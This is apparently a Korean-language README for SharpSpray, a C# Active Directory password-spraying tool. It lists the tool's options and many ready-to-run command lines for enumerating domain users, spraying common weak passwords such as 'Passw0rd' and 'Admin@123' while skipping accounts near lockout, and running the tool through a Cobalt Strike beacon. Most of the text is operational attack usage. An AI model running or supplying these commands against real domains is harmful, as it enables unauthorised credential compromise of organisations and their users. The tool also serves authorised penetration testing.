
Active Directory 비밀번호 스프레이 도구. 사용자 목록을 자동으로 가져오고 잠금 가능성을 방지합니다.
SharpSpray는 .NET C#으로 작성된 Windows 도메인 비밀번호 스프레이 도구입니다.
SharpSpray는 향상된 추가 기능을 갖춘 DomainPasswordSpray의 C# 포트입니다. 이 도구는 LDAP 프로토콜을 사용하여 도메인 Active Directory 서비스와 통신합니다.
> SharpSpray.exe --help
-v, --Verbose 자세한 메시지 표시.
-u (선택 사항) 사용자 목록 파일 경로. 지정하지 않으면 Active Directory에서 자동 가져옴.
-p 단일 비밀번호 또는 '|'로 구분된 비밀번호 목록. 비밀번호 스프레이 수행에 사용됨.
-k, --pl (선택 사항) 비밀번호 목록 파일 경로.
-d (선택 사항) 도메인 이름 지정.
-m 도메인 컨텍스트 외부의 호스트에서 스프레이할 때 이 옵션 사용.
-q, --dc-ip 옵션 'm' OutsideDomain이 선택된 경우 필수.
-x 사용자 목록에서 비활성 계정 제외 시도
(옵션 -m과 함께 사용 불가).
-z 잠금 임박 계정 제외 (옵션 -m과 함께 사용 불가).
-f 사용자에 대한 사용자 정의 LDAP 필터 (예: "(description=*admin*)").
-o 결과를 출력할 파일.
-w 도메인 잠금 관찰 창 설정을 사용하지 않고 이 특정 값 사용. (기본값: 32분).
-s (선택 사항) 인증 시도 간 지연 시간(초).
-j (선택 사항) 지터(초).
--Force 확인 없이 강제 시작.
--get-users-list Active Directory에서 도메인 사용자 목록 가져오기.
--show-examples Active Directory에서 도메인 사용자 목록 가져오기.
--show-args 명령줄 인수 표시.
--help 이 도움말 화면 표시.
SharpSpray.exe -v -x -z --pl password.txt
SharpSpray.exe -v -x -z -p "Passw0rd|Admin@123|Admin@2022"
SharpSpray.exe -v -x -z -p "Passw0rd"
SharpSpray.exe -x -z -u users.txt --pl psswd.txt
SharpSpray.exe -x -z -u users.txt -p Passw0rd!
SharpSpray.exe -x -z -s 3 -j 1 -u users.txt -k psswd.txt -o sprayed.txt
SharpSpray.exe -w 32 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe -w 32 -s 3 -j 1 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe --get-users-list
SharpSpray.exe --get-users-list > users.txt
PS> .\SharpSpray.exe --get-users-list | Out-File -Encoding ascii users.txt
* Cobalt Strike에서 사용:
beacon> execute-assembly C:\Users\sec\Desktop\tmp\sharpspray.exe --Force -w 32 -s 3 -j 1 -x -z -v -p "Passw0rd|Admin@123|Admin@2022"
* Cobalt에서 작업 확인:
beacon> jobs
다음 명령은 도메인 사용자를 가져와 콘솔에 목록을 출력합니다.
SharpSpray.exe -x -z --get-users-list
-x: 사용자 목록에서 비활성 계정 제외.
-z: 잠금 임박 계정 제외.